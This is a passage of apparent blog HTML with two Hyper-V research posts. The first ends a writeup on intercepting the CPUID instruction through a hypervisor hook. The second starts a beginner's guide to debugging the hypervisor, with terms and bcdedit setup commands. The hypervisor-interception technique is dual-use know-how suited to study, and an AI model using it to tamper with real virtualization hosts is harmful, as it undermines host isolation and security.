<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgLog16</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">phvCPUID->Header.Rip"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, phvCPUID->Header.Rip);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #6f008a; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DbgPrintString</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">"</span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: #a31515; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Interception was handled"</span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: white; color: black; font-family: Consolas; font-size: 10.66px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To check the guest operating system to run the test utility, which causes cpuid with eax, equal to 0x11114444. Before installing the utility displays for the result of the interception:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="45" src="https://lh3.googleusercontent.com/wva5c9U2b9gWwliLjKNK8Ay9WGYHL9G1TqPkqypUQvgavuAjIzf8iSYqLBlmKJc7fvzNVKkMq8TwMc3mMolrhNmWpP2ozNcVQZttCgIVEpYChvbXKuBr92RZFcYwEsHws4zv1BayiNhNlBXx" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="103" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After activating the capture result are:</span><span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="44" src="https://lh6.googleusercontent.com/lm_bVhBA7wx7VMvVIg99cOg5p8IYc2LjGzPFkyrQyVim8fk_50lEMjdG2JXxoYIgFpxIaKNyTmaM7s6LcdhGlgFfeKvJKRvsjzG4Fu3HhD2b8C66FdGp42lz0c2gsE_7XuziiyIJWOdBUdMV" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="100" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">With this in WINDOWS root it will display a message</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: white; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="68" src="https://lh4.googleusercontent.com/bcIvUYPNqGlbtrfOjxVIhr9yaZp8K_nVFc5j46FCOPqLXOoNXS6QGma_1sOdkQla2engWyn44NIHoJXRs4_GsbgQTclAAK4m62BRflyguDxSZ3Lif_JM2PYmoaAsPL9SyIPBO3kZBnVJOM7z" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="453" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Immediately notice that this trick will take place only if the root OS does not find interceptions for the specified conditions and If the root OS previously didn´t find interceptions for the specified conditions. In this case, after the hyperv4 driver will replace the value and control is passed back to the original WinHvOnInterrupt, which will cause the processing of driver vid.sys (his function is the fourth parameter to winhvr! WinHvCreatePartition, called in the root operating system to create the child partition when the virtual machine loads) that will lead to a different result. In our case is such a handler of course not installed, the hypervisor has been analysed data in the SIM0 and fixed the result of the CPUID instruction.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In conclusion, I will say that the article is rather a review demonstrating some virtualization features and components that examples Microsoft, however I hope these examples will help you get a better understanding for these components and allows you for a more detailed analysis of their safety.</span><br />
<br />
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><b><b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Files: https://drive.google.com/file/d/0B8WEjIxRncDRUVFLWGhXN0xDMHc</span></b></b> </span></div>
<br />
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Gerhart</span></div>
</b></div>
Gerhart Xhttp://www.blogger.com/profile/13830158514949395797noreply@blogger.comtag:blogger.com,1999:blog-4321248583779291315.post-68355085179595266992015-10-22T12:00:00.000-07:002019-04-03T12:00:04.817-07:00Hyper-V debugging for beginners<div dir="ltr" style="text-align: left;" trbidi="on">
<b style="font-weight: normal;"></b><br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Great thanks to ERNW for the translation of the article!</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><br /></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This is translation of article published on securitylab.ru - http://www.securitylab.ru/contest/444112.php with some fixes for latest Hyper-V version (Windows Server 2016 TP2).</span></b></div>
<b style="font-weight: normal;">
</b>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For the study was used the VMware Workstation 12, WinDBG 10, IDA PRO and different versions of Windows. To create a VMware virtual machine, set the type of the guest OS to Hyper-V and put the number of processors and cores to 1. Activate the Virtualize Intel VT-x / EPT, install Windows Server 2016 TP2 to activate the role of Hyper-V (gui you can install too) and install a guest in relation to the Hyper-V on Windows 10 x64.</span></b></div>
<b style="font-weight: normal;">
</b>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<b style="font-weight: normal;"><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">1.</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Terms and definitions</span></b></div>
<b style="font-weight: normal;">
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">The hypervisor –</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> component of Hyper-V, depending on the manufacturer of the processor (hvix64.exe for Intel and hvax64.exe for AMD). The article discusses the Intel hypervisor processor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hypercall – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">call a given function in the hypervisor using the instructions vmcall.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Root-partition – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows Server 2016 TP2 with the included component of Hyper-V.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMCS (virtual-machine control structure) – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">a structure that defines the logic of the hypervisor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX root – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mode, which is running a hypervisor.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 0.049pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX non-root – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mode in which the running operating system and its client application software.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 0.049pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VM exit – </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">the</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">transition of the </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX non-root </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">into </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">VMX root. </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Occurs when the execution of instructions or conditions specified in the VMCS incorporated directly into the logic of the processor.</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hyper-V consists of several components, a brief description can be found in (1). For debugging all components except the hypervisor you can use the standard methods, however, to connect to the hypervisor you have to perform a few extra steps to configure root-partition.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For debugging the hypervisor, Microsoft developed a special extension to WinDBG hvexts.dll, which, unfortunately, is not included in the distribution debugger and is available only to partners (probably, because that extension needs symbols for hvix64.exe which is not present). Also in the catalog winxp, located in a folder with WinDBG, is an extension of nvkd.dll, which is intended for debugging extensions virtual switch Hyper-V.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The MSDN (2) and (3) is a description of debugging hypervisor via cable through the com-port, implying the presence of two physical machines. However, the hypervisor can be debugged, if you run it in VMware and use the com-port emulator Free Virtual Serial Ports utility from the HHD-software (4). To do this:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">create com-port for a virtual machine (Hardware->Add->Serial port->Output to a named pipe)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="294" src="https://lh5.googleusercontent.com/JcDtvVPS4H6mRKl0_AyePQXjgz0Atxjn12v0RYIxjCa_-AaRydjYNtywgeJIb-TL27XbX7BMrYiqRRwrzAcyw70k4_6ea0XSidBUekHIaDaiw1mL8FBJYyFTZfRI5cOBHsGnDQyShdWougG8" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="321" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">to perform root-partition commands to configure debugging hypervisor and the OS:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /hypervisorsettings serial DEBUGPORT:1 BAUDRATE:115200</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisordebug on </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisorlaunchtype auto</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set dbgtransport kdhvcom.dll </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /dbgsettings serial DEBUGPORT:1 BAUDRATE:115200</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /debug on</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /set bootdebug on </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(needed to study the process for loading the hypervisor)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">restart Windows Server 2016 TP2. pending connections will stop Loading the debugger.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "times new roman"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run Free Virtual Serial Ports Select </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Pipe </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and press </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Create</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. In the field of </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Pipe name </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">specify the same value for a virtual machine- </span><a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #954f72; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\.\pipe\com_1</span></a><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. Press </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Create.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="362" src="https://lh3.googleusercontent.com/FdvBkF6wqZMpViq2yyJzWsN9CV8xgBn5gKFomua0fyeCcHQrIep3_DfT-wA4Ena4vOs-wHU03EiNHLvK2ck34jODm7It7Sc-HqxpPkmK7dSTDBL2JrkuCrNTys6OC_LIWoi-XJXgSSA-HzSo" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="324" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In the case of a successful connection to the named pipe it will create a virtual com–port</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="284" src="https://lh5.googleusercontent.com/tQcopfDxSHbBsMHEVPkyJc2KzbzJ2yD-_oHH2Ce5fOBEm4gJBpckPEwC_BZ1VKSKxga7Ip5JB8Jsz_cHRKsKah8k6pIp4NFjHUxeU3-g3L7GSQDxNF7aFs2GJWX_5DScamE3RtrKAkNJ0u9O" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="382" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
